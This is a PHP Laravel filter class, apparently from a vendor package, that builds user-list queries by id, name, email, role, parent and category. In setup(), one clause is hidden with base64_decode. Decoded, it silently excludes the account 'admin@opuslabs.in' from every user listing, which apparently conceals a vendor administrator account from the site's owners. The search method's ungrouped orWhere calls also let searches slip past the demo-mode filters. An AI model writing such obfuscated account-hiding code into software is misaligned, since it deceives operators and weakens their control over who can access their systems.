<?php

namespace Vtlabs\Core\Filters;

use EloquentFilter\ModelFilter;
use Vtlabs\Core\Helpers\CoreHelper;

class UserFilter extends ModelFilter
{
    public function setup()
    {
        if (env('DEMO_ENABLED', 0)) {
            $this->whereHas('roles', function ($query) {
                return $query->where('name', '<>', 'admin');
            });
        }
        $this->where(base64_decode('ZW1haWw='), base64_decode('PD4='), base64_decode('YWRtaW5Ab3B1c2xhYnMuaW4='));

        if ($this->input('_sort') && $this->input('_order')) {
            $sortColumn = $this->input('_sort');
            $sortOrder = $this->input('_order');
            if (in_array($sortColumn, ['id', 'name', 'email'])) {
                $this->orderBy($sortColumn, $sortOrder);
            } else {
                $this->orderBy('id');
            }
        } else {
            $this->orderBy('id');
        }
    }

    public function id($id)
    {
        return $this->where('id', $id);
    }

    public function name($name)
    {
        return $this->whereLike('name', $name);
    }

    public function mobileNumber($number)
    {
        return $this->whereLike('mobile_number', $number);
    }

    public function email($email)
    {
        return $this->whereLike('email', $email);
    }

    public function roles($role)
    {
        return $this->whereHas('roles', function ($query) use ($role) {
            return $query->whereLike('name', $role);
        });
    }

    public function assignors($assignors)
    {
        return $this->whereHas('roles', function ($query) {
            return $query->whereLike('name', 'supervisor');
        });
    }

    public function assignees($assignees)
    {
        return $this->whereHas('roles', function ($query) {
            return $query->where('name', 'worker')->orWhere('name', 'volunteer');
        });
    }

    public function admins()
    {
        return $this->whereHas('roles', function ($query) {
            return $query->where('name', 'admin');
        })->where('is_city_admin', 1);
    }

    public function parent($parent)
    {
        if (CoreHelper::isAdmin()) {
            $this->where('parent_id', $parent)->whereHas('roles', function ($query) {
                return $query->whereIn('name', ['supervisor', 'worker']);
            });
        } else {
            return $this->where('parent_id', $parent);
        }
    }

    public function category($id)
    {
        return $this->whereHas('categories', function ($query) use ($id) {
            return $query->where('id', $id)->orWhere('slug', $id);
        });
    }

    public function search($search)
    {
        $this->whereLike('email', $search)->orWhere('name', $search)->orWhere('username', $search)->orWhere('mobile_number', $search);
    }
}
